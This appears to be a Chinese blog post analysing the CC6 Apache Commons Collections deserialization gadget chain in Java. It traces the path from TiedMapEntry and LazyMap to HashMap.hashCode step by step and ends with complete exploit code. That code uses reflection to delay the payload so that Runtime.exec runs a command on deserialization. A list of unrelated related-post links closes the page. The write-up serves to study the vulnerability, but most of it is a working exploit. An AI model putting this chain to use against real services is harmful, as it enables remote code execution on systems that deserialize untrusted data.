cc6鏈

毛利_小五郎發表於2024-07-20

TiedMapEntry

第一步

與cc1一樣前面執行程式碼部分不變

  Transformer[] transformers = {
            new ConstantTransformer(Runtime.class),
            new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", null}),
            new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, null}),
            new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc"})
    };
    HashMap<Object, Object> hashMap = new HashMap<>();
    ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
    Map decorateMap = LazyMap.decorate(hashMap, chainedTransformer);

然後我們看LazyMap get原始碼

public Object get(Object key) {
    // create value for key if key is not currently in the map
    if (map.containsKey(key) == false) {
        Object value = factory.transform(key);
        map.put(key, value);
        return value;
    }
    return map.get(key);
}

第二步

這個時候我們要找地方呼叫get:tiedmapentry

public TiedMapEntry(Map map, Object key) {
    super();
    this.map = map;
    this.key = key;
}
public Object getValue() {
    return map.get(key);
}

Transformer[] transformers = {
            new ConstantTransformer(Runtime.class),
            new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", null}),
            new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, null}),
            new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc"})
    };
    HashMap<Object, Object> hashMap = new HashMap<>();
    ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
    Map decorateMap = LazyMap.decorate(hashMap, chainedTransformer);
    TiedMapEntry tiedMapEntry = new TiedMapEntry(decorateMap, "key");
    tiedMapEntry.getValue();

第三步

因為 getValue() 這一個方法是相當相當常見的，所以我們一般會優先找同一類下是否存在呼叫情況。

尋找到同名函式下的 hashCode() 方法呼叫了 getValue() 方法。

public int hashCode() {
    Object value = getValue();
    return (getKey() == null ? 0 : getKey().hashCode()) ^
           (value == null ? 0 : value.hashCode()); 
}

第四步

我們去找誰呼叫了hashCode() 方法

在 Java 反序列化當中，找到 hashCode() 之後的鏈子用的基本都是這一條。

xxx.readObject()
  HashMap.put() --自動呼叫-->   HashMap.hash()
	後續利用鏈.hashCode()

put函式

public V put(K key, V value) {
    return putVal(hash(key), key, value, false, true);
}

hash函式

static final int hash(Object key) {
    int h;
    return (key == null) ? 0 : (h = key.hashCode()) ^ (h >>> 16);
}

執行程式碼

    Transformer[] transformers = {
            new ConstantTransformer(Runtime.class),
            new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", null}),
            new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, null}),
            new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc"})
    };
    HashMap<Object, Object> hashMap = new HashMap<>();
    ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
    Map decorateMap = LazyMap.decorate(hashMap, chainedTransformer);
    TiedMapEntry tiedMapEntry = new TiedMapEntry(decorateMap, "key");
    HashMap<Object, Object> expMap = new HashMap<>();
    expMap.put(tiedMapEntry, "value");

第五步

因為上面的程式碼不用等到序列化反序列化就執行了，所以我們要對其中一個引數進行修改，導致他到其中一步就不會執行，然後等所有值都給完了之後透過反射進行修改，接著進行序列化就能執行了

Map decorateMap = LazyMap.decorate(hashMap, chainedTransformer);

上面這個變成

Map<Object,Object> lazymap = LazyMap.decorate(map,new ConstantTransformer(1));

這樣他在第一時間就不能被執行了

       Transformer[] transformers = new Transformer[]{
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", null}),
                new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, null}),
                new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc"})
        };
        ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
        HashMap<Object,Object> map = new HashMap<Object,Object>();
        Map<Object,Object> lazymap = LazyMap.decorate(map,new ConstantTransformer(1));
        TiedMapEntry tiedMapEntry = new TiedMapEntry(lazymap,"aaa");
        HashMap<Object,Object> map2 = new HashMap<>();
        map2.put(tiedMapEntry,"bbb");

解析其中一部分程式碼

1.Map<Object,Object> lazymap = LazyMap.decorate(map,new ConstantTransformer(1));

這個程式碼的意思是假如傳入的key不存在那麼他的value就是1，比如

map.put("key1", 100); map.put("key2", 200);
Map<Object, Object> lazyMap = LazyMap.decorate(map, new ConstantTransformer(1));
Object value1 = lazyMap.get("key1"); // 從原始 map 獲取，返回 100
Object value2 = lazyMap.get("key3"); // 不存在於原始 map，返回 ConstantTransformer 中的常量值 1

2.TiedMapEntry tiedMapEntry = new TiedMapEntry(lazymap,"aaa");

這個程式碼就是傳入map為lazymap，然後找key為aaa的，沒有就是讓他的value為1

下一步就是刪掉鍵值為aaa的然後把鍵值為chainTransform的傳入，因為他前面已經把put那些搞好了，修改值然後進行序列化就可以觸發了，而不是在前面put就直接觸發

        map.remove("aaa");
        Class c = LazyMap.class;
        Field fieldfactory = c.getDeclaredField("factory");
        fieldfactory.setAccessible(true);
        fieldfactory.set(lazymap,chainedTransformer);
        serialize(map2);
        unserialize("ser.bin");

全部程式碼

       Transformer[] transformers = new Transformer[]{
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", null}),
                new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, null}),
                new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc"})
        };
        ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
        HashMap<Object,Object> map = new HashMap<Object,Object>();
        Map<Object,Object> lazymap = LazyMap.decorate(map,new ConstantTransformer(1));
        TiedMapEntry tiedMapEntry = new TiedMapEntry(lazymap,"aaa");
        HashMap<Object,Object> map2 = new HashMap<>();
        map2.put(tiedMapEntry,"bbb");
        map.remove("aaa");
        Class c = LazyMap.class;
        Field fieldfactory = c.getDeclaredField("factory");
        fieldfactory.setAccessible(true);
        fieldfactory.set(lazymap,chainedTransformer);
        serialize(map2);
        unserialize("ser.bin");

Java反序列化利用鏈篇 | CC6鏈分析（通用版CC鏈）
2024-09-23
Java
CC6分析與利用
2024-06-25
java 反序列化 cc6 復現
2024-10-04
Java
區塊鏈開發_建立區塊鏈公鏈,聯盟鏈,私有鏈
2019-01-29
區塊鏈
區塊鏈 2.0：公有鏈與私有鏈（七）
2019-07-10
區塊鏈
[友鏈] 個人網站友鏈
2019-03-27
網站
區塊鏈教程、區塊鏈指南、區塊鏈中文手冊、區塊鏈原理
2017-12-30
區塊鏈
區塊鏈中的“跨鏈”
2022-03-17
區塊鏈
區塊鏈baas平臺企業私有鏈聯盟鏈搭建
2019-11-08
區塊鏈
宗譜鏈介紹，區塊鏈宗譜鏈優勢
2021-01-28
區塊鏈
騰訊安全釋出《CCGP跨鏈治理白皮書》，實現“以鏈治鏈”跨鏈協作
2021-01-15
宗譜鏈APP,區塊鏈宗譜鏈傳承家族文化
2021-02-05
APP區塊鏈
什麼是區塊鏈的鏈外交易和鏈內交易
2018-08-14
區塊鏈
以太坊學習筆記——————11、公有鏈、聯盟鏈、私有鏈
2018-06-18
筆記
火幣鏈/波場鏈/OK鏈/幣安鏈/馬蹄鏈佛薩奇系統開發技術案例及原始碼
2023-03-01
原始碼
原型鏈
2020-11-10
原型
食物鏈
2024-10-18
友鏈~
2024-07-17
友鏈
2024-10-31
3分鐘瞭解區塊鏈中的公有鏈和私有鏈
2017-09-29
區塊鏈
火幣鏈/波場鏈/OK鏈/幣安鏈/馬蹄鏈盲盒遊戲系統開發實現技術原理及分析
2023-03-01
遊戲
呼叫鏈系列（2）：輕呼叫鏈實現
2019-08-14
什麼是區塊鏈改革“鏈改”？
2018-08-15
區塊鏈
區塊鏈鏈重組是什麼？
2022-06-02
區塊鏈
單鏈錶鏈式結構的建立
2015-10-15
外鏈工具：助力高效外鏈建設
2024-06-22
區塊鏈技術開發公司聊區塊鏈“主鏈”價值
2018-08-23
區塊鏈
區塊鏈技術開發主鏈區塊鏈的應用分析
2022-06-13
區塊鏈
區塊鏈公鏈系統發展，主鏈系統發展方向
2022-06-16
區塊鏈
區塊鏈100講：區塊鏈為什麼叫“區塊”“鏈”？
2018-05-04
區塊鏈
ARB鏈/TRX鏈/BSC鏈/跨鏈swap交易所lp兌換系統開發|APP搭建|案例詳情
2023-09-19
APP
宗譜鏈功能優勢，區塊鏈宗譜鏈讓家譜更科技
2021-02-01
區塊鏈
宗譜鏈價值，區塊鏈宗譜鏈app傳承文化介紹
2021-01-29
區塊鏈APP
原型、原型鏈、作用域、作用域鏈、閉包
2019-02-23
原型
在區塊鏈上開發遊戲：鏈遊
2022-05-16
區塊鏈開發遊戲
區塊鏈系列1-區塊鏈概述
2018-08-07
區塊鏈
區塊鏈知識,區塊鏈簡史
2018-08-12
區塊鏈
3.6 以太坊私有鏈與聯盟鏈搭建
2018-11-08